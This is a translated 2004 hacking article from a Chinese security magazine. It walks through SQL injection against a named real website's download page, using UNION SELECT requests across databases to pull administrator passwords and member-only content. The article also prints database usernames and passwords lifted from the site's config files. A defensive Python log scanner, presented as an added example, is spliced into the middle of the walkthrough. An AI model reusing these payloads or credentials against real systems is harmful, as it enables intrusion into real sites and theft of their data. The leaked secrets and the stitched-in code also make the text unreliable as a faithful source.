Author: angel. Article type: original. Original release date: 2004-09-17. Disclaimer: This article has been published in "Hacker X Files"; please credit the source when reprinting.

I don't know whether you have run into this situation: you want to get some sensitive information out of a PHP+MySQL forum that is locked down tight. What do you do? Social engineering? Go after the host? Actually, nobody needs to be so pessimistic. Following the usual habit of us web security enthusiasts, you browse the other resources on the same site; if some other PHP+MySQL system there has a vulnerability, we can use the injection in the vulnerable system to reach the hardened one, much as you would start from a weaker host on the same network segment. It is that simple.

In this article I can tell you that injection in PHP is quite different from injection in ASP. In ASP almost anything is injectable, but in PHP an injection point only exists when an int-type variable is not filtered, or when the point takes a quote and magic_quotes_gpc is turned off. In fact, as long as an injection in PHP can be exploited successfully, there is usually more opportunity to penetrate the host than merely to get WebAdmin. In the few articles I have written on injecting MySQL through PHP, the principle is actually the same; the reason I set this one apart is that some of the damage is quite large. Given that summer vacation is the peak season for students hacking sites, I decided to publish it later, in September. In any case, with this kind of thing you have to consider the consequences.

The story still starts with the member area of Black and White (heibai.net), because I saw something a little interesting there: without needing to get onto the server, and without a download address, I could see the "new foreign spyware". Very simple things do not need to be made complicated. All the download addresses in the member zone are of the form:
http://www.heibai.net/vip/ I guessed this was worth a closer look. Sure enough, looking at the membership login box below it, it turns out to be the login entrance of the article system: the member tools are stored through the article system as one category of articles. The article system used by the Black and White member area is Yminfo. Since the host is shared with the other sites, I figured all the tables should be in the same database, so I queried the Yminfo user table User by submitting:
http://www.heibai.net/down/show.php?id=5174 121, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1%20FROM%20User An error: the table does not exist. Could it be that the two web programs do not use the same database? First I dumped the download system's configuration file (see "Advanced SQL Injection with MySQL"; because the night cat download system has a vulnerability, it is easy to get the web root's absolute path from the program's error messages). The download system's configuration file is located at:
D:/starkun/down/include/config.inc.php Part of its content is as follows:
$dbhost = "localhost"; // Database host name
$dbuser = "Download"; // Database username
$dbpasswd = "kunstar988"; // Database password
$dbname = "download"; // Database name

So the download system uses the download database. Now let's look at the article system. Its configuration file is located at d:/starkun/article/include/config.inc.php, and part of its content is as follows:
$dbhost = "localhost"; // Database host name
$dbuser = "root"; // Database username
$dbpass = "234ytr8ut"; // Database password
$dbname = "article"; // Database name

They really are different databases; Black and White is in the habit of using this trick. I also knew that remote connections to MySQL were prohibited, so I went to the MySQL manual to see what could be used. I had seen the relevant passage before but never paid attention to it. The manual says:
You can refer to a table within the current database as tbl_name, or as db_name.tbl_name to specify a database explicitly. You can refer to a column as col_name, tbl_name.col_name, or db_name.tbl_name.col_name. You need not specify a tbl_name or db_name.tbl_name prefix for a column reference in a SELECT statement unless the reference would be ambiguous. See Section 6.1.2, Database, Table, Index, Column, and Alias Names, for examples of ambiguity that require the more explicit column reference forms.

In other words, we can query across databases. Following the statement format above, let's see whether the table used by Yminfo exists in the Article database. Submit:
http://www.heibai.net/down/show.php?id=5174 121, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1%20FROM%20Article.user Huh, the page comes back normally: the table exists. In fact a cross-database query is that simple; it is exactly the same as usual, just with the database name prefixed to the table name. But we are not finished yet: I still have to get what I want. Getting the administrator's information is simple as long as you are familiar with the data structure, and the query is easy to construct:
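As an added example that is not part of the original article, here is defender-side detection logic for the two conditions the requests above depend on: a value in an integer id parameter that the application never cast to int, and a UNION SELECT whose FROM clause reaches into another database as db_name.tbl_name. The access-log lines are constructed for the example, not taken from the site discussed; the paths and parameter names mirror the article's.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Constructed sample access-log lines (not taken from the article's target server).
# The query strings copy the shape of the requests described in the article:
# an integer id parameter followed by UNION SELECT ... FROM [db.]table.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Sep/2004:10:00:01 +0800] "GET /down/show.php?id=5174 HTTP/1.1" 200 4120
10.0.0.9 - - [17/Sep/2004:10:00:07 +0800] "GET /down/show.php?id=5174%20UNION%20SELECT%201,1,1%20FROM%20User HTTP/1.1" 500 233
10.0.0.9 - - [17/Sep/2004:10:00:12 +0800] "GET /down/show.php?id=10000%20Union%20Select%201,password,1%20FROM%20Article.user%20where%20Usergroupid=1 HTTP/1.1" 200 5011
10.0.0.7 - - [17/Sep/2004:10:01:00 +0800] "GET /article/list.php?sortid=11 HTTP/1.1" 200 9000
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
UNION_RE = re.compile(r'\bunion\s+(?:all\s+)?select\b', re.IGNORECASE)
# FROM <db>.<table>: the cross-database reference form the article describes.
CROSS_DB_RE = re.compile(r'\bfrom\s+([A-Za-z_]\w*)\.([A-Za-z_]\w*)', re.IGNORECASE)

def classify_request(raw_url):
    """Return a finding for one request URL, or None if nothing looks like injection."""
    query = urlsplit(raw_url).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl decoded once; decode again so a double-encoded payload (%2520) is caught.
        decoded = unquote_plus(value)
        if not UNION_RE.search(decoded):
            continue
        match = CROSS_DB_RE.search(decoded)
        return {
            "param": name,
            # A parameter that should be an integer but carries SQL means the
            # application never cast it (intval) or bound it as a parameter.
            "non_numeric": not decoded.strip().isdigit(),
            # Non-None means the injected query reaches another database, which only works
            # if the app's DB account was granted it; one least-privilege account per app blocks this.
            "cross_db": (match.group(1), match.group(2)) if match else None,
        }
    return None

def scan_log(text):
    findings = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        finding = classify_request(match.group(1))
        if finding is not None:
            finding["line"] = line
            findings.append(finding)
    return findings
```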
http://www.heibai.net/down/show.php?id=10000 Union Select 1,1, 1, 1, 1, 1, 1, 1, 1, 1 ,password ,1, 1, 1, 1, 1, 1, 1%20FROM%20Article.user%20where%20Usergroupid=1 The result is shown in the figure. However, getting this is useless, because the program uses session verification and there is no way to spoof it, so let's continue on to the member software information instead. There are too many records; how do I know which infoid belongs to the member area? There is a Sortid field in the info table that records which category a record belongs to, so all the member records will have Sortid = 11. Let's see what information comes back and then take the next step. Submit:
http://www.heibai.net/down/show.php?id=10000 Union Select 1 ,TITLE, 1,1, 1, 1, 1, pageText, 1, 1, 1, 1, 1, 1, 1%20FROM%20Article.info%20where%20Sortid = 11 Haha, it actually dumped the call page of the member software, which was a real surprise. It turns out the Black and White member area also uses night cat download 1.x.x, and a brand-new download system at that. All the member software sits there without any verification, just one directory level deeper. The address is:
http://www.heibai.net/****/newdownload
That wraps things up here. The article is quite simple and was written in one sitting; if you want to find me, go to the Security Angel forum or the BST forum.